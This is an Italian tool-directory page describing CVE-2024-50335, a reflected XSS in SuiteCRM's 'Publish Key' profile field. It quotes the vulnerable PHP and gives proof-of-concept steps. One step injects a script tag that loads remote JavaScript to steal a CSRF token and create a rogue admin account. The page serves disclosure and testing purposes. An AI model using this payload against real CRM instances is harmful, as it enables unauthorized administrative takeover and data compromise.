Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50335 — Una vulnerabilità di sicurezza in SuiteCRM che può essere sfruttata per rubare token CSRF ed eseguire azioni non autorizzate, come la creazione di nuovi utenti amministrativi senza un'autenticazione adeguata. | Kitploit
Strumenti/GitHubGitHub/shellkraft/cve-2024-50335
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

Una vulnerabilità di sicurezza in SuiteCRM che può essere sfruttata per rubare token CSRF ed eseguire azioni non autorizzate, come la creazione di nuovi utenti amministrativi senza un'autenticazione adeguata.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-50335: XSS autenticato nel campo "Publish Key" che consente la creazione non autorizzata di utenti amministratori

Sommario

Il campo "Publish Key" nella pagina Edit Profile di SuiteCRM è vulnerabile a Cross-Site Scripting (XSS) riflesso, consentendo a un attaccante di iniettare codice JavaScript malevolo. Ciò può essere sfruttato per rubare token CSRF ed eseguire azioni non autorizzate, come la creazione di nuovi utenti amministrativi senza una corretta autenticazione.


Dettagli

La vulnerabilità deriva da una validazione e sanificazione insufficiente dell'input del campo Publish Key all'interno dell'applicazione SuiteCRM. Quando un attaccante inietta uno script malevolo, questo viene eseguito nel contesto della sessione di un utente autenticato. Lo script iniettato (o.js) sfrutta quindi il token CSRF catturato per forgiare richieste che creano nuovi utenti amministrativi, compromettendo di fatto l'integrità e la sicurezza dell'istanza CRM.


Impatto

Questa vulnerabilità è un problema critico di Cross-Site Scripting (XSS). Il suo impatto include:

  1. Accesso amministrativo non autorizzato: un attaccante può creare nuovi utenti amministrativi, ottenendo potenzialmente il controllo completo dell'istanza CRM.
  2. Furto di token CSRF: consente di eseguire azioni non autorizzate per conto di utenti autenticati.
  3. Compromissione dell'integrità dei dati: la capacità di manipolare account utente e impostazioni può portare a perdita, divulgazione o modifica non autorizzata dei dati.

Codice sorgente PHP vulnerabile

root@kitploit:~
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);

PoC

  1. Accedere a SuiteCRM utilizzando credenziali di amministratore valide.
  2. Andare su Edit Profile: accedere alla pagina Edit Profile dell'account amministratore.
  3. Nel campo "Publish Key" sotto la scheda Advanced, iniettare il seguente script:
root@kitploit:~
<script src=//localhost:1235/o.js>
  1. Assicurarsi che o.js sia ospitato su un server su localhost sulla porta 1235, servendo il codice exploit come descritto nel frammento di codice JavaScript fornito.
  2. Salvare le modifiche al profilo dell'amministratore.
  3. Al ricaricamento della pagina SuiteCRM, lo script malevolo o.js viene eseguito, rubando il token CSRF e usandolo per creare un nuovo utente amministrativo con le seguenti credenziali.
root@kitploit:~
Username - imposter
Password - ok
  1. Accedere con le credenziali del nuovo utente amministrativo creato per verificare il successo dello sfruttamento.

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
  • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
Scarica lo strumento